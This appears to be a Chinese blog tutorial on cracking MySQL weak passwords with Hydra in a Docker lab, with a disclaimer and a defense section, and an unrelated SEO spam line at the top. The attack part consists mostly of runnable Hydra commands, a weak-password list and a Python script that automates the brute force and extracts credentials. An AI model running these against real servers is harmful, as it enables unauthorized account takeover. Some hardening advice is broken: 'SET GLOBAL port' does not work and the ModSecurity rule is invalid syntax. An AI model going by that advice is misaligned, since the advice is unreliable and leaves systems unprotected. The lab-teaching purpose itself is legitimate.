合作seo公司济南做seo外包

渗透测试实战：使用Hydra破解MySQL弱口令（附合法授权流程+防御方案）

郑重声明：本文仅供安全学习研究，任何未经授权的网络攻击行为均属违法。实操需获得目标系统书面授权，请遵守《网络安全法》相关规定。

一、实验环境搭建（合法授权测试）

1.1 测试环境配置

#先拉取镜像：靶机246docker pull swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/library/mysql:5.7
# 使用Docker快速搭建MySQL测试环境
docker run --name mysql_test -e MYSQL_ROOT_PASSWORD=123456 -p 3306:3306 -d swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/library/mysql:5.7# 创建测试账户
docker exec -it mysql_test mysql -uroot -p123456 CREATE USER 'testuser'@'%' IDENTIFIED BY '123456';
FLUSH PRIVILEGES;GRANT ALL PRIVILEGES ON *.* TO 'testuser'@'%';
FLUSH PRIVILEGES;

1.2 Hydra工具安装

#虚拟机镜像下载地址
https://www.kali.org/get-kali/#kali-platforms
#下载kali linux镜像
kali-linux-2025.1a-installer-amd64.iso
#vm上安装kali linux

二、弱口令爆破实战步骤

2.1 准备密码字典

创建 passwords.txt 文件：

123456
admin
root
password
qwerty
test
123456789
letmein
Welcome123# 下载常用弱口令字典（可选）
wget https://githubfast.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

创建user.txt用户名字典：

root
testuser

2.2 基础爆破命令

#限制并发任务数
hydra -t 1 -l testuser -P passwords.txt mysql://192.167.14.246
#不限制并发数（可选）
hydra -l testuser -P passwords.txt mysql://192.167.14.246
#（可选）
hydra -L user.txt -P password.txt ssh://靶机ip

2.3 高级参数爆破

hydra -L users.txt -P passwords.txt \
mysql://192.167.14.246 -vV -t 32 -f -I \
-s 3306 -e ns -W 3 -o result.txt

参数解析：

• -vV：显示详细过程
• -t 32：使用32个线程
• -f：找到第一个匹配后停止
• -s 3306：指定非标准端口
• -e ns：尝试空密码和用户名密码相同
• -W 3：请求间隔3秒

三、自动化破解脚本示例

3.1 Python自动化检测脚本

import subprocess
import redef hydra_mysql_attack(target_ip, port, user_list, pass_list):cmd = ['hydra','-L', user_list,'-P', pass_list,'-e', 'ns','-s', str(port),'-o', 'hydra_result.txt','mysql://' + target_ip]process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,text=True  # 确保输出为文本)output_buffer = ""while True:# 逐字符读取输出char = process.stdout.read(1)if not char and process.poll() is not None:breakif char:output_buffer += char# 检查是否包含有效凭证if "successfully" in output_buffer.lower():print("[+] 发现有效凭证：")matches = re.findall(r'login:\s*(\S+)\s+password:\s*(\S+)', output_buffer)if matches:for match in matches:print(f"用户名: {match[0]}, 密码: {match[1]}")process.terminate()break# 使用示例
hydra_mysql_attack(target_ip="192.167.14.246",port=3306,user_list="users.txt",pass_list="passwords.txt"
)

四、防御加固方案

4.1 MySQL安全配置

-- 修改默认端口
SET GLOBAL port = 3366;-- 启用密码复杂度策略
INSTALL PLUGIN validate_password SONAME 'validate_password.so';
SET GLOBAL validate_password_policy=STRONG;-- 设置登录失败锁定
ALTER USER 'testuser'@'%' WITH FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 1;

4.2 网络层防护

# 使用iptables限制访问
iptables -A INPUT -p tcp --dport 3306 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 3306 -j DROP# 启用SSL加密
mysql_ssl_rsa_setup --uid=mysql

五、法律风险告知

1. 授权测试：必须获得目标系统的书面授权
2. 日志留存：测试过程需完整记录日志备查
3. 数据保护：禁止接触真实业务数据
4. 报告机制：发现漏洞后应立即停止测试并报告

六、攻击特征分析（WAF防护策略）

6.1 识别Hydra攻击特征

# 典型攻击日志特征
[Warning] Host '192.168.1.5' has more than 'max_connect_errors' 
[Note] Aborted connection 45 to db: 'unconnected' user: 'testuser' 

6.2 防御规则示例（ModSecurity）

<SecRule ENGINE:DETECT_HYDRA "@ge 5" "phase:1,id:1001,deny,status:403,
msg:'Hydra brute force attack detected',logdata:'Matched count: %{MATCHED_VAR}'"

技术总结：本文演示了在合法授权环境下使用Hydra进行MySQL弱口令检测的全流程。安全从业人员应掌握攻击原理以建立有效防御，普通用户需提高密码安全意识。

拓展阅读：

• 《MySQL 8.0安全白皮书》
• OWASP认证安全指南

请务必遵守网络安全法律法规，技术需向善！ 🔐

如果本教程帮助您解决了问题，请点赞❤️收藏⭐支持！欢迎在评论区留言交流技术细节！